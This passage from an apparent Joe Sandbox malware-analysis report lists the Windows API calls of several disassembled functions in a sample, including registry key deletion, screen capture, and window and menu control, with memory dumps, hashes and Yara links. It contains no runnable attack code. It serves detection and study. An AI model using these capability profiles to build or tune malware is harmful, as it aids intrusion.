                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4C8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4FE
                                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103C154
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103C1D2
                                                                                                                                                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 0103C26A
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0103C2DE
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0103C2FC
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0103C352
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0103C364
                                                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0103C382
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0103C3E3
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0103C3F4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8a27a9d5af2d8e46bb0a07ecc2da3d7915f4b78fe4c4777d9517c7c8097c516e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 19a784a007e478dae736a83fba941444826589f83d972259d46cd4c3a4b52b29
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a27a9d5af2d8e46bb0a07ecc2da3d7915f4b78fe4c4777d9517c7c8097c516e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52C1C174204301AFE710DF69C994F6ABBE5BF84304F04849DF49A9B2A2CB75E946CF81
                                                                                                                                                                                                                                                                                                        Function 01032FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 01033035
                                                                                                                                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 01033045
                                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 01033051
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0103305E
                                                                                                                                                                                                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 010330CA
                                                                                                                                                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 01033109
                                                                                                                                                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0103312D
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 01033135
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0103313E
                                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 01033145
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 01033150
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0c4d069fce6b68e4650d1ec94bab2af6365ab4c7ba7accc50e4a73923038692c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2bc9847922faefd1897964d93ad53c567619d32df71ac41361ae0cd54924c638
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c4d069fce6b68e4650d1ec94bab2af6365ab4c7ba7accc50e4a73923038692c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D361F3B5D00219AFCB15CFE4D984EAEBBB9FF88310F208519E995A7210D775A941CF90
                                                                                                                                                                                                                                                                                                        Function 0104A94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0104A990
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 0104A9A7
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0104A9B3
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0104A9C9
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0104AC15
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0104AC33
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0104AC54
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0104AC73
                                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0104AC95
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000005,?), ref: 0104ACBB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                                        • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8b54db5a54ab58143de8cc9162a6c15c425e444afafd9fcd54022c660aaeabc1
                                                                                                                                                                                                                                                                                                        • Instruction ID: bec144e062d5c7655e8a28f147c1458ab35818d1b8f42e15bb81e5472f5c7900
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b54db5a54ab58143de8cc9162a6c15c425e444afafd9fcd54022c660aaeabc1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8BB189B4640219DFDF54CF68C9C47AE7BF2BF44704F0480A9ED8A9B296D775A980CB90
                                                                                                                                                                                                                                                                                                        Function 010152AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 010152E6
                                                                                                                                                                                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 01015328
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01015339
                                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 01015345
                                                                                                                                                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 0101537A
                                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 010153B2
                                                                                                                                                                                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 010153EB
                                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 01015445
                                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 01015477
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 010154EF
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                        • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                        • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6badd7133afbc61cd1a19ea4b6a3c7f954cada80464076936c659c0940c82d14
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3ea389c0ea0a24ef61f26becbec4cfb9695ca63b620cec0a2d6c4e5139393d12
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6badd7133afbc61cd1a19ea4b6a3c7f954cada80464076936c659c0940c82d14
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35912571104706AFD709DF28CD90BAAB7E9FF86304F044519FAC68B185EB39E915CB81
                                                                                                                                                                                                                                                                                                        Function 0104976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 010497B6
                                                                                                                                                                                                                                                                                                        • GetFocus.USER32 ref: 010497C6
                                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 010497D1
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 01049879
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0104992B
                                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 01049948
                                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 01049958
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0104998A
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 010499CC
                                                                                                                                                                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 010499FD
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: f426cd045e0cf33b38920b4c42c6c3fca83a904fb30a29a6c01d2ddff21ce939
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5d83afaa5d8f300b8e225038e2320c6fe80e7325a28cfff6811b96f4343535aa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f426cd045e0cf33b38920b4c42c6c3fca83a904fb30a29a6c01d2ddff21ce939
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B81A1B55043019FEB21CF58C8C4AAB7BE8BB88358F04497DF9C597281DB35D905CBA1
                                                                                                                                                                                                                                                                                                        Function 0101C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(010829C0,000000FF,00000000,00000030), ref: 0101C973
                                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(010829C0,00000004,00000000,00000030), ref: 0101C9A8
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0101C9BA
                                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 0101CA00
                                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0101CA1D
                                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 0101CA49
                                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 0101CA90
                                                                                                                                                                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0101CAD6
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101CAEB
                                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101CB0C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: 00cea6e29edcb758f85a3fcdb303a00a665a05606245cef908e7318b3afc2012
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6585fb58a3e61d7c9168e21a19c0ee54f4be28e190d0c048677f96b5fe65d177
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00cea6e29edcb758f85a3fcdb303a00a665a05606245cef908e7318b3afc2012
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD6195B1940245AFFF22CFA8DA88AFE7FB9FB05348F044055E991A3145DB39E900DB61
                                                                                                                                                                                                                                                                                                        Function 0101E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0101E4D4
                                                                                                                                                                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0101E4FA
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101E504
                                                                                                                                                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 0101E554
                                                                                                                                                                                                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0101E570
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                        • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                                        • Opcode ID: 19dd5cabf667194617b50cd238e99b92d30040515fdd09e17455b0d7bd19f30a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5c8be3944e7ffd65cba23556422dd4f8ac46cd2205b56ad764758b8a36957153
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19dd5cabf667194617b50cd238e99b92d30040515fdd09e17455b0d7bd19f30a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC411972A402147BDB01A7A5CC47FBF77ADDF55750F04006AF940A6182FB7DD601A3A5
                                                                                                                                                                                                                                                                                                        Function 0103D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0103D6C4
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0103D6ED
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0103D7A8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0103D70A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0103D71D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0103D72F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0103D765
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0103D788
                                                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0103D753
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                                        • Opcode ID: fced4a0fb89591b73245b7a8d933070aa6cecb1da373631f9dd6fcc22185722d
                                                                                                                                                                                                                                                                                                        • Instruction ID: e104bbf4df5c310ced39f03135980b79295ff189c34261772b5d98e636cfbe59
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fced4a0fb89591b73245b7a8d933070aa6cecb1da373631f9dd6fcc22185722d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 153182B5A01129BBD7229AD5DCC8EFF7BBCEF95650F0000A5B985E3204E7349A459BA0
                                                                                                                                                                                                                                                                                                        Function 0101EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 0101EFCB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCF215: timeGetTime.WINMM(?,?,0101EFEB), ref: 00FCF219
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0101EFF8
                                                                                                                                                                                                                                                                                                        • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0101F01C
                                                                                                                                                                                                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0101F03E
                                                                                                                                                                                                                                                                                                        • SetActiveWindow.USER32 ref: 0101F05D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0101F06B
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0101F08A
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 0101F095
                                                                                                                                                                                                                                                                                                        • IsWindow.USER32 ref: 0101F0A1
                                                                                                                                                                                                                                                                                                        • EndDialog.USER32(00000000), ref: 0101F0B2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                                        • String ID: BUTTON
                                                                                                                                                                                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                                        • Opcode ID: e52729594189e7f5ed884565d8d62b7d390f3ed611a64b84c61098a8252a17ed
